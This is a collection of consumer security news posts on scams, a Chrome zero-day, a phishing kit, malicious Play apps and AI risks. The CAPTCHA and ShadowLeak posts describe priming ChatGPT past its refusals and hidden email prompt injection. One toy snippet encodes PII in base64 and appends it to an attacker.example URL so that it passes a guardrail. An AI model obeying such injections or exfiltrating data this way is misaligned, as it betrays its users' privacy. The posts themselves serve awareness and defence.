
American Archive of Public Broadcasting allowed access to restricted media for years

A security flaw in the American Archive of Public Broadcasting (AAPB) website allowed unauthorized access to protected and private media, according to BleepingComputer.

The American Archive of Public Broadcasting (AAPB) is a collaborative initiative between the Library of Congress and WGBH Educational Foundation, aimed at digitally preserving historically significant public radio and television programs from the past seven decades.

The archives encompass a wide array of materials: news and public affairs programs, local history productions, educational content, science, music, art, literature, environmental programming, and raw interviews from landmark documentaries. The digitized content contains millions of items, including unique, sometimes sensitive material documenting pivotal events, regional culture, and documentary evidence of America’s civil and artistic history.

Access without proper controls could facilitate copyright violations or the misuse of material critical for scholarship, public education, and future generations. And that’s what the discovered vulnerability provided.

Not only did this vulnerability go unnoticed for years, but the researcher who discovered the hole found evidence of active exploitation dating back to at least 2021, continuing even after the same researcher had previously reported it to AAPB. When BleepingComputer reached out, however, AAPB implemented a fix within 48 hours, and the researcher confirmed it worked.

AAPB’s Communications Manager, Emily Balk, told BleepingComputer:

“We’re committed to protecting and preserving the archival material in the AAPB and have strengthened security for the archive.”

The exploit method began circulating on Discord in mid-2024, but even before that, a simple script allowed users to request media files by ID and bypass AAPB’s access controls. The method worked even if the requested files fell into protected or private categories: as long as the request contained a valid media ID, the content could be downloaded.

Data-hoarder communities with little regard for copyright apparently abused and shared the method for years. The main impact was unauthorized access to, and sharing of, archival media, some of which was not intended for public release. This is primarily an institutional and copyright issue.
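The underlying flaw class is well known as an insecure direct object reference (IDOR): the server hands back an object for any valid ID without checking who is asking. A minimal sketch of the vulnerable pattern and its fix, using entirely hypothetical IDs, field names, and functions (not AAPB’s actual code):

```python
# All IDs, fields, and functions here are hypothetical illustrations
# of the bug class, not AAPB's actual code.

MEDIA = {
    "cpb-1234": {"access": "public", "title": "Local news broadcast, 1974"},
    "cpb-5678": {"access": "private", "title": "Raw interview footage"},
}

def fetch_media_vulnerable(media_id):
    # Vulnerable pattern: any valid ID returns the item,
    # regardless of its access level.
    return MEDIA.get(media_id)

def fetch_media_fixed(media_id, user_is_authorized=False):
    # Fixed pattern: the access level is enforced server-side
    # before anything is returned.
    item = MEDIA.get(media_id)
    if item is None:
        return None
    if item["access"] != "public" and not user_is_authorized:
        return None
    return item
```

The fix is a single authorization check, which is exactly why this class of bug is so easy to introduce and so easy to miss.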

However, users should:

  • Avoid sharing or downloading protected or leaked content, as you could be in a legal gray area.
  • Be wary of unofficial sources circulating rare or unpublished public broadcasting material.
  • Expect phishing emails themed around this breach. As with other news events, phishers will use it as clickbait.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Scammers are impersonating the FBI to steal your personal data

Been scammed? Hoping to report it to the FBI? Definitely do so, but be careful. Spoofed versions of the FBI’s Internet Crime Complaint Center (IC3) website are now circulating online, and they lead straight back to the scammers.

The FBI issued an advisory last week, warning that cybercriminals are setting up fake versions of their site to tempt people into entering their personal information:

“Members of the public could unknowingly visit spoofed websites while attempting to find FBI IC3’s website to submit an IC3 report.”

Criminals spoof legitimate sites like the IC3 portal using techniques including ‘typosquatting’. They’ll create web domains that look like the target, but have subtle differences in the URL. They’ll often misspell or add characters to a domain name, which can deceive users attempting to report cybercrime incidents.
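One way defensive tools catch typosquats is to compare a domain against a list of known-good domains using string similarity. A rough sketch of the idea, with an illustrative allow-list and threshold (a real tool would use a much larger list and additional signals):

```python
from difflib import SequenceMatcher

# Illustrative allow-list; a real tool would use a much larger one.
KNOWN_GOOD = ["ic3.gov", "fbi.gov"]

def looks_like_typosquat(domain, threshold=0.8):
    """Flag domains suspiciously similar to, but not exactly,
    a known legitimate domain."""
    domain = domain.lower()
    for good in KNOWN_GOOD:
        if domain == good:
            return False          # exact match: legitimate
        if SequenceMatcher(None, domain, good).ratio() >= threshold:
            return True           # near match: likely typosquat
    return False
```

A domain like "ic3s.gov" scores very close to "ic3.gov" and gets flagged, while an unrelated domain does not.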

The IC3 is the primary hub for cybercrime reporting in the US, and its services are in high demand. According to the 2024 IC3 Crime Report, victims filed 859,532 complaints last year, totaling $16.6 billion in losses (up a third from 2023).

Criminals recognize that victims seeking help are often vulnerable to secondary attacks. After all, these victims have already been caught out once and are likely at an emotional disadvantage. So criminals often succeed in luring them to fake portals like these, with a view to scamming them again. A distracted or distraught victim can easily hand over sensitive data a second time, including names, addresses, phone numbers, email addresses, and banking information.

This threat follows a disturbing pattern of law enforcement impersonation lately. In April this year, the FBI reported that criminals were targeting victims via social media, emails, and phone calls. In some cases, scammers would use fake social media accounts to approach members of fraud victim groups, convincing them that their funds had been recovered.

Attackers often impersonate law enforcement directly. In March, the FBI Philadelphia Field Office reported that scammers were routinely spoofing authentic law enforcement and government agency phone numbers to extort money from victims. A 2023 NPR investigation revealed how criminals leverage caller ID spoofing and voice cloning technology to impersonate real US Marshals.

As far back as 2022, the FBI reported that people were impersonating its officials. In one particularly nasty scenario, victims were first duped by romance scammers; when they became wise to the trick and cut communications, the organization behind the scam would contact them again, pretending to be a government official offering help to catch the romance scammers, or telling the victim that their name had been linked to a crime and needed to be cleared.

If you do fall victim to this kind of fraud, it’s far from certain that you’ll get your money back. The IC3’s 2024 report documents the Recovery Asset Team’s efforts to combat fraud through the Financial Fraud Kill Chain, which achieved a 66% success rate in freezing funds from fraudulent transactions. According to that report, the average victim of online crime lost almost $20,000.

How to protect yourself

The main thing to remember is that IC3 employees will never contact you directly via phone, email, or social media, and will never request payment for fund recovery. If someone recommends that you visit a site for fund recovery, take that recommendation with several swimming pools’ worth of salt.

If you suspect you’ve already been scammed, then quick reporting is key. Stop talking to the scammers immediately and get in touch with the IC3 now. Do that by typing the www.ic3.gov web address directly into your browser rather than relying on someone else’s link or a search result.

All online crime is nasty, but this portal scam is particularly horrid, because it often targets people who have already been hit once. As always, check in with your less-tech-savvy friends and relatives to ensure they haven’t fallen victim to something like this, especially if they’re older. One infuriating stat from the IC3 report is that the older the victim, the greater the loss.


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

Beware of Zelle transfer scams

As we have said many times before, falling for a scam can happen to the best of us. And it can ruin lives. In our podcast How a scam hunter got scammed, scam hunter Julie-Anne Kearns talked about how she had been duped by people pretending to be from HMRC, which is the UK’s version of the US Internal Revenue Service (IRS).

This week in the New York Times, crime reporter Michael Wilson, who has covered many scams during his career, described how he almost fell for one that used a spoofed Chase Bank telephone number. Michael’s story sounded vaguely familiar to us, because we reported on something similar back in 2022.

The scam is a prime example of how social engineering is used to talk victims out of their money.

Michael received a call, seemingly from a Chase bank branch. The caller even invited him to Google the number and pointed out which branch he was “calling from.” The scammer claimed that fraudulent Zelle transfers had been made to and from a bank account in his name, even though Michael had never opened an account with Chase.

The initial scammer gave Michael a case number and put him through to “his supervisor.” This man asked Michael to open Zelle.

Zelle is a popular US peer-to-peer payment service that allows users to send and receive money quickly and securely directly from their bank accounts using just an email address or mobile phone number.

Where it says, “Enter an amount,” the “supervisor” instructed him to type $2,100, the amount of the withdrawals he said he was going to help reverse. In another field the scammer wanted Michael to enter the 10 digits of the case number. This triggered Michael’s spidey senses—it looked suspiciously like a phone number:

“This case number sure looks like a phone number, and I’m about to send that number $2,100.”

[Image: Zelle transfer form; the receiver can be an email address or a telephone number]

At that point the scammer gave him a 19-character code to put in the “What’s this for?” field, telling Michael it was needed for his team to be able to reverse the transaction.

But that didn’t calm his spidey senses, and Michael asked the question that scares most scammers away: he proposed to meet in person and settle the matter. The scammer pushed back, saying it might be too late by then, but Michael persisted and said he’d call back.

Only then did he realize the scammers had kept him on the hook for 16 minutes before he managed to break free.

“I should be able to spot a scam in under 16 seconds, I thought — but 16 minutes?”

Michael found that several others had been approached in the very same way. The “supervisor” is an element that provides legitimacy to the call and makes people feel like they’re talking to actual bank employees.

And once they have you filling out forms and writing down long codes, they have turned you from a critical thinker into a person with a mission to fulfil.

For completeness’ sake, Michael went to the bank branch and asked for the two employees he’d allegedly spoken to. Unsurprisingly, they didn’t work there, but an employee who did recognized the scam, said she’d heard the story many times before, and knew of a few people who had lost money to these scammers.

How to avoid Zelle scams

Several aspects of this attack are common to many others and may indicate a fraud attempt.

  • They don’t want you to call the bank back. If you do this, the scam falls apart because their number is spoofed. A genuine member of staff would have no issue with you calling them.
  • Pressure tactics. If a bank calls you out of the blue and claims that they’re powerless to stop something without your assistance, be very cautious. Is your bank really unable to perform a basic banking action?
  • Knowing your date of birth, address, and other information doesn’t mean the caller is genuine. They may have obtained the data from a phish, or a security breach.
  • Referencing third party payment apps may be another red flag, especially if they talk about a platform you’ve not used before.

Zelle transfers are instantaneous and almost impossible to reverse. And neither banks nor Zelle are liable for fraudulent payments, so a refund is highly unlikely. So, be extra careful when using Zelle.

Did you know you can use Malwarebytes Scam Guard for this kind of situation as well? We tested Scam Guard with some details from the NYT story, and it correctly identified it as a known scam, asked some follow-up questions, and provided a clear set of recommendations.



ChatGPT solves CAPTCHAs if you tell it they’re fake

If you see fewer or different CAPTCHA puzzles in the near future, it won’t be because website owners have agreed that they’re annoying; it may be because CAPTCHAs no longer prove that a visitor is human.

For those who forgot what CAPTCHA stands for: Completely Automated Public Turing test to tell Computers and Humans Apart.

The fact that AI bots can bypass CAPTCHA systems is nothing new. Sophisticated bots have been bypassing CAPTCHA systems for years using methods such as optical character recognition (OCR), machine learning, and AI, making traditional CAPTCHA challenges increasingly ineffective.

Most of the openly accessible AI chat agents have been barred from solving CAPTCHAs by their developers. But now researchers say they’ve found a way to get ChatGPT to solve image-based CAPTCHAs. They did this by prompt injection, similar to “social engineering” a chatbot into doing something it would refuse if you asked it outright.

In this case, the researchers convinced ChatGPT-4o that it was solving fake CAPTCHAs.

According to the researchers:

“This priming step is crucial to the exploit. By having the LLM affirm that the CAPTCHAs were fake and the plan was acceptable, we increased the odds that the agent would comply later.”

This is something I have noticed myself. When I ask an AI to help me analyze malware, it often starts by saying it is not allowed to help me, but once I convince it I’m not going to improve it or make a new version of it, then it’ll often jump right in and assist me in unravelling it. By doing so, it provides information that a cybercriminal could use to make their own version of the malware.

The researchers proceeded by copying the conversation they had with the chatbot into the ChatGPT agent they planned to use.

A chatbot is built to answer questions and follow specific instructions given by a person, meaning it helps with single tasks and relies on constant user input for each step. In contrast, an AI agent acts more like a helper that can understand a big-picture goal (for example, “book me a flight” or “solve this problem”) and can take action on its own, handling multi-step tasks with less guidance needed from the user.

A chatbot relies on the person to provide every answer, click, and decision throughout a CAPTCHA challenge, so it cannot solve CAPTCHAs on its own. In contrast, an AI agent plans tasks, adapts to changes, and acts independently, allowing it to complete the entire CAPTCHA process with minimal user input.

What the researchers found is that the agent had no problems with one-click CAPTCHAs, logic-based CAPTCHAs, and CAPTCHAs based on text-recognition. It had more problems with image-based CAPTCHAs requiring precision (drag-and-drop, rotation, etc.), but managed to solve some of those as well.

Is this the next step in the arms race, or will web developers accept that AI agents and AI browsers are simply helping humans get the information they need from a website, with or without a puzzle to solve?


We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

A week in security (September 15 – September 21)

Last week on Malwarebytes Labs:

Stay safe!


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

ChatGPT Deep Research zero-click vulnerability fixed by OpenAI

OpenAI has moved quickly to patch a vulnerability known as “ShadowLeak” before anyone detected real-world abuse. Revealed by researchers yesterday, ShadowLeak was an issue in OpenAI’s Deep Research project that attackers could exploit by simply sending an email to the target.

Deep Research was launched in ChatGPT in early 2025 to let users delegate time-intensive, multi-step research tasks to an autonomous agent. It is a form of agentic AI, a term for AI systems that can act autonomously to achieve objectives by planning, deciding, and executing tasks with minimal human intervention. Deep Research users are primarily found in finance, science, policy, engineering, and similar fields.

Users are able to select a “deep research” mode, input a query—optionally providing the agent with files and spreadsheets—and receive a detailed report after the agent browses, analyzes, and processes information from dozens of sources.

The researchers found a zero-click vulnerability in the Deep Research agent that worked when the agent was connected to Gmail and allowed to browse. By sending the target a specially crafted email, an attacker could make the agent leak sensitive inbox information, without the target needing to do anything and without any visible signs.

The attack relies on prompt injection, which is a well-known weak spot for AI agents. The poisoned prompts can be hidden in email by using tricks like tiny fonts, white-on-white text, and layout tricks. The target will not see them, but the agent still reads and obeys them.

The data leak is also impossible for internal defenses to pick up, since it occurs server-side, directly from OpenAI’s cloud infrastructure.
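One defensive idea is to strip invisible text from an email’s HTML before an agent ever sees it. The sketch below is a simplification: real hiding tricks are far more varied than the few inline styles checked here, and all names are illustrative:

```python
import re
from html.parser import HTMLParser

# Inline styles that commonly hide text; real tricks are more varied.
HIDDEN_STYLES = re.compile(
    r"display\s*:\s*none|font-size\s*:\s*0|color\s*:\s*#?fff",
    re.IGNORECASE,
)

class VisibleTextExtractor(HTMLParser):
    """Collects only text that a human reader would actually see."""

    def __init__(self):
        super().__init__()
        self.hidden_depth = 0
        self.parts = []

    def handle_starttag(self, tag, attrs):
        style = dict(attrs).get("style") or ""
        # Once inside a hidden element, everything nested stays hidden.
        if self.hidden_depth or HIDDEN_STYLES.search(style):
            self.hidden_depth += 1

    def handle_endtag(self, tag):
        if self.hidden_depth:
            self.hidden_depth -= 1

    def handle_data(self, data):
        if not self.hidden_depth:
            self.parts.append(data)

def visible_text(html: str) -> str:
    parser = VisibleTextExtractor()
    parser.feed(html)
    return "".join(parser.parts)
```

Filtering what the agent reads down to what the human would see closes at least the crudest hiding tricks, though it is no substitute for treating all email content as untrusted input.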

The researchers say it wasn’t easy to craft an effective email due to existing protection (guardrails) which recognized straight-out and obvious attempts to send information to an external address. For example, when the researchers tried to get the agent to interact with a malicious URL, it didn’t just refuse. It flagged the URL as suspicious and attempted to search for it online instead of opening it.

The key to success was to get the agent to encode the extracted PII with a simple method (base64) before appending it to the URL.

“This worked because the encoding was performed by the model before the request was passed on to the execution layer. In other words, it was relatively easy to convince the model to perform the encoding, and by the time the lower layer received the request, it only saw a harmless encoded string rather than raw PII.”

In the example the researchers used Gmail as a connector, but many other sources present structured text that can be used as a potential prompt injection vector.
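The encoding trick can be illustrated with a toy guardrail. The filter, URLs, and email address below are entirely hypothetical; the point is that a naive PII check passes the base64-encoded form while blocking the raw one:

```python
import base64

def naive_guardrail(url):
    # Illustrative filter: looks only for obvious PII markers
    # in an outgoing request URL.
    return "@" not in url and "ssn" not in url.lower()

pii = "jane.doe@example.com"
blocked = "https://attacker.example/?q=" + pii
allowed = "https://attacker.example/?q=" + base64.b64encode(pii.encode()).decode()

# The raw URL fails the check; the encoded one sails through,
# yet it decodes straight back to the PII on the attacker's side.
```

This mirrors the researchers’ finding: because the model performed the encoding before the request reached the execution layer, the lower layer only ever saw a harmless-looking string.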

Safe use of AI agents

While it’s always tempting to use the latest technology, doing so comes with a certain amount of risk. To limit those risks when using AI agents, you should:

  • Be cautious with permissions: Only grant access to sensitive information or system controls when absolutely necessary. Review what data or accounts the agent can access and limit permissions where possible.
  • Verify sources before trusting links or commands: Avoid letting the agent automatically interact with unfamiliar websites or content. Check URLs carefully and be wary of sudden redirects, additional parameters, or unexpected input requests.
  • Keep software updated: Ensure the agent and related AI tools are always running the latest versions to benefit from security patches and improvements against prompt injection exploits.
  • Use strong authentication and monitoring: Protect accounts connected to AI agents with multi-factor authentication and review activity logs regularly to spot unusual behavior early.
  • Educate yourself about prompt injection risks: Stay informed on the latest threats and best practices for safe AI interactions. Awareness is the first step to preventing exploitation.
  • Limit automation of sensitive operations: Avoid fully automating high-stakes transactions or actions without manual review. AI agents should assist, but critical decisions deserve human oversight.
  • Report suspicious behavior: If an agent acts unpredictably or asks for strange permissions, report it to the developers or security teams immediately for investigation.


Disrupted phishing service was after Microsoft 365 credentials

Microsoft and Cloudflare have disrupted a Phishing-as-a-Service operation, known as RaccoonO365.

The primary goal of RaccoonO365 (or Storm-2246, as Microsoft calls it) was to rent out a phishing toolkit that specialized in stealing Microsoft 365 credentials. The kit was used successfully in at least 5,000 cases, spanning 94 countries, since July 2024.

The operation provided the cybercriminals’ customers with stolen credentials, cookies, and data which they in turn could use to plunder OneDrive, SharePoint, and Outlook accounts for information to use in financial fraud, extortion, or to serve as initial access for larger attacks.

Roughly, an attack would look like this:

  • Emails were sent to victims with an attachment containing a link or QR code.
  • The malicious link led to a page with a simple CAPTCHA. This and other anti-bot techniques were implemented to evade analysis without raising suspicion from the victim.
  • After solving the CAPTCHA, the victim was redirected to a fake Microsoft O365 login page designed to harvest the entered credentials.

RaccoonO365 built its operation on top of legitimate infrastructure in an attempt to avoid detection. Leveraging free accounts, they strategically deployed Cloudflare workers to act as an intermediary layer, shielding their backend phishing servers from direct public exposure.

Reacting to this abuse of its services, Cloudflare teamed up with Microsoft’s Digital Crimes Unit (DCU). Using a court order granted by the Southern District of New York, the DCU seized 338 websites associated with RaccoonO365.

The danger of phishing kits like these is clear. Even non-technical criminals can lease a 30-day plan for $355 (paid in cryptocurrency) and get their hands on valid Microsoft 365 credentials. With the kit’s latest feature, its users can even receive codes for certain multi-factor authentication (MFA) methods.

From there they can move forward to data theft, financial fraud, or even use the credentials to infiltrate an organization to deploy ransomware. And to give you an idea, RaccoonO365 customers were able to send emails to 9,000 targets per day. The suspected leaders of the operation had over 850 members on Telegram and have received at least US$100,000 in cryptocurrency payments.

The takedown of the websites and the attribution to a Nigerian suspect cut off the cybercriminals’ revenue streams and significantly increased RaccoonO365’s operational costs. Besides that, the main suspect is believed to be the main coder behind the project, and his apprehension by international law enforcement is likely to be a major blow to the operation.

Now, RaccoonO365 phishing kit customers can start worrying about how much of their information could be revealed in the aftermath of this disruption.

We’ll keep you posted.

Don’t fall for phishing attempts

In the operations run by RaccoonO365’s customers, two simple rules could have saved you from a lot of trouble.

  • Don’t click on links in unsolicited attachments
  • Check that the website address in the browser matches the domain you expect to be on (e.g. microsoft.com).
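The second rule can be sketched in code. The expected domain below is illustrative, and a real-world check should use a proper public-suffix list rather than simple string matching:

```python
from urllib.parse import urlparse

def on_expected_domain(url, expected="microsoft.com"):
    """True only if the URL's host is the expected domain
    or one of its subdomains."""
    host = urlparse(url).hostname or ""
    return host == expected or host.endswith("." + expected)
```

Note that a lookalike such as "microsoft.com.evil.example" fails the check, because the registrable domain is what matters, not whether the familiar name appears somewhere in the address.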

Other important tips to stay safe from phishing in general:

  • Verify the sender: Always check if the sender’s email address matches what you would expect it to be. It’s not always conclusive but it can help you spot some attempts.
  • Check through an independent channel if the sender actually sent you an attachment or a link.
  • Use up-to-date security software, preferably with a web protection component.
  • Keep your device and all its software updated.
  • Use multi-factor authentication for every account you can.
  • Use a password manager. Password managers will not auto-fill a password to a fake site, even if it looks like the real deal to you.


Update your Chrome today: Google patches 4 vulnerabilities including one zero-day

Google has released an update for its Chrome browser to patch four security vulnerabilities, including one zero-day. A zero-day vulnerability refers to a bug that has been found and exploited by cybercriminals before the vendor even knew about it (they have “zero days” to fix it).

This update is crucial since it addresses one vulnerability which is already being actively exploited and, reportedly, can be abused when the user visits a malicious website. It probably doesn’t require any further user interaction, which means the user doesn’t need to click on anything in order for their system to be compromised.

The Chrome update brings the version number to 140.0.7339.185/.186 for Windows and Mac, and 140.0.7339.185 for Linux.

The easiest way to update Chrome is to allow it to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.

To manually get the update, click the more menu (three stacked dots), then choose Settings > About Chrome. If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is reload Chrome in order for the update to complete, and for you to be safe from the vulnerabilities.

[Image: Chrome settings showing “Chrome is up to date”]

You can find more elaborate update instructions and how to read the version number in our article on how to update Chrome on every operating system.

Technical details on the zero-day vulnerability

Google describes the zero-day vulnerability, tracked as CVE-2025-10585, as a type confusion in V8, reported by the Google Threat Analysis Group on September 16, 2025.

Despite the short statement—Google never reveals a lot of details until everyone has had a chance to update—there are a few conclusions we can draw.

It helps to know that V8 is Google’s open-source JavaScript engine.

A “type confusion” vulnerability happens when code uses an object without verifying its type, so the program mistakenly treats one kind of data as if it were another, like reading a list as a single value or interpreting a number as text. This mix-up can make the software behave unpredictably, creating opportunities for attackers to break in, steal data, crash programs, or even run malicious code.
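A toy illustration of the bug class (not of V8’s internals): using Python’s ctypes, the same four bytes can be read as an innocent integer or as a pointer-like address, depending on which type the code believes it is holding:

```python
import ctypes

# Two hypothetical structures that interpret the same four bytes
# differently -- a toy model of type confusion, not V8's object layout.
class ArrayLength(ctypes.Structure):
    _fields_ = [("length", ctypes.c_uint32)]

class ObjectRef(ctypes.Structure):
    _fields_ = [("address", ctypes.c_uint32)]

raw = bytes(ArrayLength(0x41414141))        # an attacker-chosen number...
confused = ObjectRef.from_buffer_copy(raw)  # ...reinterpreted as a reference

# confused.address is now 0x41414141: code that trusts the wrong type
# would "dereference" a value the attacker fully controls.
```

In a real engine, that confusion between a plain value and a reference is what lets an attacker turn a number they supply into memory the program reads or writes.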

Google’s Threat Analysis Group (TAG) focuses on spyware and nation-state attackers who abuse zero days for espionage purposes.

So, it stands to reason that an attacker used JavaScript on a malicious site to exploit this vulnerability and lured targeted victims to that website.

TAG reported the bug on September 16, and Google issued the patch one day later. That turnaround implies the bug was urgent, or very easy to fix, and probably both to some extent.

Usually, as more details become known or a patch gets reverse engineered, cybercriminals will start using the vulnerability in less targeted attacks.

Users of other Chromium-based browsers, such as Microsoft Edge, Brave, Opera, and Vivaldi, are also advised to keep an eye out for updates and install them when they become available.



Age verification and parental controls coming to ChatGPT to protect teens

OpenAI is going to try and predict the ages of its users to protect them better, as stories of AI-induced harms in children mount.

The company, which runs the popular ChatGPT AI, is working on what it calls a long-term system to determine whether users are over 18. If it can’t verify that a user is an adult, they will eventually get a different chat experience, CEO Sam Altman warned.

“The way ChatGPT responds to a 15-year-old should look different than the way it responds to an adult,” Altman said in a blog post on the issue.

Citing “principles in conflict,” Altman talked in a supporting blog post about how the company is struggling with competing values: allowing people the freedom to use the product as they wish, while also protecting teens (the system isn’t supposed to be used by those under 13). Privacy is another concept it holds dear, Altman said.

OpenAI is prioritizing teen safety over its other values. Two things that it shouldn’t do with teens, but can do with adults, are flirting and discussing suicide, even as a theoretical creative writing endeavor.

Altman commented:

“The model by default should not provide instructions about how to commit suicide, but if an adult user is asking for help writing a fictional story that depicts a suicide, the model should help with that request.”

It will also try to contact a teen user’s parents if it looks like the child is considering taking their own life, and possibly even the authorities if the child seems likely to harm themselves imminently.

The move comes as lawsuits mount against the company from parents of teens who took their own lives after using the system. Late last month, the parents of 16-year-old Adam Raine sued the company after ChatGPT allegedly advised him on suicide techniques and offered to write the first draft of his suicide note.

The company hasn’t gone into detail about how it will try and predict user age, other than looking at “how people use ChatGPT.” You can be sure some wily teens will do their best to game the system. Altman says that if the system can’t predict with confidence that a user is an adult, it will drop them into teen-oriented chat sessions.

Altman also signaled that ID authentication might be coming to some ChatGPT users. “In some cases or countries we may also ask for an ID; we know this is a privacy compromise for adults but believe it is a worthy tradeoff,” he said.

While OpenAI works on the age prediction system, Altman recommends parental controls for families with teen users. Available by the end of the month, these controls will allow parents to link their teens’ accounts with their own, guide how ChatGPT responds to them, and disable certain features, including memory and chat history. They will also allow blackout hours, and will alert parents if their teen seems to be in distress.

This is a laudable step, but the problems are bigger than the effects on teens alone. As Altman says, this is a “new and powerful technology”, and it’s affecting adults in unexpected ways too. This summer, the New York Times reported that a Toronto man, Allen Brooks, fell into a delusional spiral after beginning a simple conversation with ChatGPT.

There are plenty more such stories. How, exactly, does the company plan to protect those people?



224 malicious apps removed from the Google Play Store after ad fraud campaign discovered

Researchers have discovered a large ad fraud campaign on Google Play Store.

The Satori Threat Intelligence and Research team found 224 malicious apps which were downloaded over 38 million times and generated up to 2.3 billion ad requests per day. They named the campaign “SlopAds.”

Ad fraud is a scheme in which advertisers are made to pay for ad impressions (the number of times an ad has been seen) that are enormously exaggerated or were never shown to a real person.

While the main victims of ad fraud are the advertisers, there are consequences for users who had these apps installed as well: devices and connections slow down because the apps carry out their malicious activity in the background, without the user ever being aware.
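To put the reported figures in perspective, here is a rough back-of-the-envelope calculation. It assumes (unrealistically) that every download is still an active install, so the real per-device figure would be higher:

```python
# Scale of the campaign, using the figures reported above.
daily_ad_requests = 2_300_000_000  # peak ad requests per day (reported)
total_downloads = 38_000_000       # cumulative downloads (reported)

# Average hidden ad requests each installed device would generate per day,
# if every download were still active.
per_device = daily_ad_requests / total_downloads
print(f"~{per_device:.0f} hidden ad requests per installed device per day")
```

That works out to roughly 60 hidden ad requests per device per day on average, which helps explain the slowed-down devices and connections users experienced.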

At first, the downloaded app behaves as advertised in order to stay under the radar of Google’s app review process and security software, provided the user installed it directly from the Play Store.

[Image: collection of services hosted by the SlopAds threat actor. Image courtesy of HUMAN Satori]

But if the installation was initiated by one of the campaign’s ads, the user also receives some extra files in the form of an encrypted payload hidden inside images via steganography.

If the app passes this first check, it receives four .png images that, when decrypted and reassembled, form an .apk file. The malicious file uses WebView (essentially a very basic browser) to send collected device and browser information to a Command & Control (C2) server, which uses that information to decide which domains to visit in further hidden WebViews.
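The extract-decrypt-reassemble step can be sketched as follows. This is a minimal illustration only: the PNG trick shown here (appending data after the IEND marker), the XOR "cipher", and all names are hypothetical stand-ins, since the exact SlopAds scheme has not been published at this level of detail.

```python
# Sketch: fragments hidden inside image files are extracted, decrypted,
# and concatenated into a single binary payload.

PNG_END = b"IEND\xaeB`\x82"  # chunk that terminates a well-formed PNG

def extract_hidden(png_bytes: bytes) -> bytes:
    """Return any bytes appended after the PNG end-of-image marker."""
    idx = png_bytes.rfind(PNG_END)
    return b"" if idx == -1 else png_bytes[idx + len(PNG_END):]

def xor_crypt(data: bytes, key: int = 0x5A) -> bytes:
    """Toy symmetric 'cipher' standing in for the real decryption step."""
    return bytes(b ^ key for b in data)

def reassemble(images: list[bytes]) -> bytes:
    """Concatenate the decrypted fragments carried by each image."""
    return b"".join(xor_crypt(extract_hidden(img)) for img in images)

# Demo: four fake "PNGs", each smuggling one encrypted payload fragment.
payload = b"PK\x03\x04 pretend apk contents"  # APKs are ZIPs, hence "PK"
parts = [payload[i:i + 7] for i in range(0, len(payload), 7)]
fake_pngs = [b"\x89PNG\r\n\x1a\n...image data..." + PNG_END + xor_crypt(p)
             for p in parts]

print(reassemble(fake_pngs) == payload)  # True: payload recovered intact
```

Hiding the payload across several innocuous-looking images is what lets the dropper slip past scanners that inspect each file in isolation.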

The researchers found evidence of an AI (Artificial Intelligence) tool training on the same domain as the C2 server (ad2[.]cc). It is unclear whether this tool actively managed the ad fraud campaign.

Based on similarities in the C2 domain, the researchers found over 300 related domains promoting SlopAds-associated apps, suggesting that the collection of 224 SlopAds-associated apps was only the beginning.

Google removed all of the identified apps listed in this report from Google Play. Users are automatically protected by Google Play Protect, which warns users and blocks apps known to exhibit SlopAds-associated behavior at install time on certified Android devices, even when apps come from sources outside of the Play Store.

You can find a complete list of the removed apps here: SlopAds app list

How to avoid installing malicious apps

While the official Google Play Store is the safest place to get your apps, there is no guarantee that an app is harmless just because it is listed there. So here are a few extra measures you can take:

  • Always check what permissions an app is requesting, and don’t just trust an app because it’s in the official Play Store. Ask questions such as: Do the permissions make sense for what the app is supposed to do? Why did necessary permissions change after an update? Do these changes make sense?
  • Occasionally go over your installed apps and remove any you no longer need.
  • Make sure you have the latest available updates for your device, and for all your important apps (banking, security, etc.).
  • Protect your Android with security software. Your phone needs it just as much as your computer.

Another precaution you can take: if you’re looking for an app, do your research before you go to the app store. As you can see from the screenshot above, many of the apps are made to look exactly like very popular legitimate ones (e.g. ChatGPT).

So, it’s important to know in advance who the official developer of the app is, and whether the app is even available in that store at all.

As researcher Jim Nielsen demonstrated for the Mac App Store, there are a lot of apps trying to look like ChatGPT, but they are not the real thing. ChatGPT is not even in the Mac App Store. It is available in the Google Play Store for Android, but make sure to check that OpenAI is listed as the developer.


We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.